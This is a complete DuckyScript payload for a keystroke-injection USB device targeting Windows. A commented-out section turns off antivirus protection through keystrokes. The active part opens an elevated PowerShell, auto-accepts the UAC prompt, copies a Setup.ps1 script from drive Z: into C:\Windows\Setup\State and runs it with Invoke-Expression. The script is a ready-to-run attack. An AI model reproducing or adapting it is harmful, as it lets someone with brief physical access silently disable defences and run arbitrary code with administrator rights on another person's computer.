REM wait for enumaration:
DELAY 2000

REM disable antivirus
REM GUI 
REM DELAY 500
REM STRING virus & threat protection
REM ENTER
REM DELAY 3000
REM TAB 
REM TAB
REM TAB
REM TAB
REM DELAY 200
REM ENTER
REM DELAY 200
REM SPACE 
REM DELAY 3000
REM ALT y
REM GUI a
REM DELAY 200
REM ALT F4

REM open powershell as Admin:
GUI r
DELAY 200
STRING powershell
DELAY 800
CTRL SHIFT ENTER
DELAY 1000
ALT y
DELAY 800

REM copy Setup.ps1 to Windows
STRING Copy-Item -Path Z:\Setup.ps1 -Destination C:\Windows\Setup\State\Setup.ps1
ENTER

DELAY 500

REM run Setup:
STRING IEX(IWR C:\Windows\Setup\State\Setup.ps1 -UseBasicParsing)
ENTER